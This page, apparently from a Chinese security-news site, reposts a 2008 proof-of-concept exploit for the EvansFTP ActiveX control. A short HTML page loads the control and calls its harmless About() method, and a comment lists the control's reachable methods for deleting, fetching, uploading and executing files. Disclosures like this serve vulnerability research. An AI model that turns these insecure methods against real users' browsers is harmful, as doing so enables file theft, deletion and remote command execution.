首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 EvansFTP (EvansFTP.ocx) Remote Insecure Methods Exploit 来源：h4ck-y0u.org 作者：t0pP8uZz 发布时间：2008-05-09   <HTML> <!-- - EvansFTP (EvansFTP.ocx) Remote Insecure Methods Exploit - Author: t0pP8uZz Homepage: h4ck-y0u.org / milw0rm.com Description: ActiveX Remote Insecure Report: Tested on Microsoft Windows XP Pro (SP2 ) Internet Explorer 7 Fully Patched ActiveX: http://www.evansprogramming.com/evansftp.asp The Following Material Is For Educational Purposes Only - I will not be held responsable for any illegal actions. InternetExplorer can Initialise this ActiveX control, And take advantage of its functions. Included in this exploit (POC) is a peice of javascript code lauching the ActiveX control, and executing one of its functions. the function being About() all this will do is lauch a friendly, harmless dialog box, therefore being the perfect POC. - EvansFTP.ocx - About Displays the Evans FTP control About Dialog. CancelTransfer Cancels in-progress file and data connection transfers. Connect Opens a connection to the remote FTP server and starts a new session thread (logs in). DeleteFile Deletes file(s) from a remote servers’ directory. Disconnect Disconnects an FTP session (logs out). Execute Executes a remote FTP server command. GetDirectory Returns a list of directory information from the remote server. GetFile Transfers files from a remote FTP server to a local PC. MakePath Creates a path on the remote server. MakePath can create multiple nested subdirectories with a single command. MkDir Creates a folder on the remote FTP server. Ping Tests if a remote server is responding. PutFile Transfers files from the local PC to a remote FTP server. RenameFile Renames a file on the remote FTP server. RmDir Removes a directory from the remote FTP server. WriteToConnection This method writes to an open data connection such as would be required to execute an ftp command like APPE. Peace. --> <OBJECT ID="test" CLASSID="CLSID:DA3C77F4-8701-11D4-908B-00010268221D">Could Not Load ActiveX Control.</OBJECT> <script language="javascript"> /* - EvansFTP (EvansFTP.ocx) Remote Insecure Methods Exploit - */ /*                       Javascript Code By t0pP8uZz                        */ test.About(); </script> </HTML>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·aaxRegistry (aaxRegistry.ocx) ·Registry Pro (epRegPro.ocx) Re ·Univeral HTTP Image/File Uploa ·Secure File Delete Wizard <= 2 ·txtCMS 0.3 (index.php) Local F ·vShare Youtube Clone 2.6 (tid) ·Joomla Component com_datsogall ·TFTP Server for Windows 1.4 ST ·rdesktop 1.5.0 process_redirec ·RunCMS <= 1.6.1 (msg_image) SQ ·Joomla Component xsstream-dm 0 ·rdesktop 1.5.0 iso_recv_msg()   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved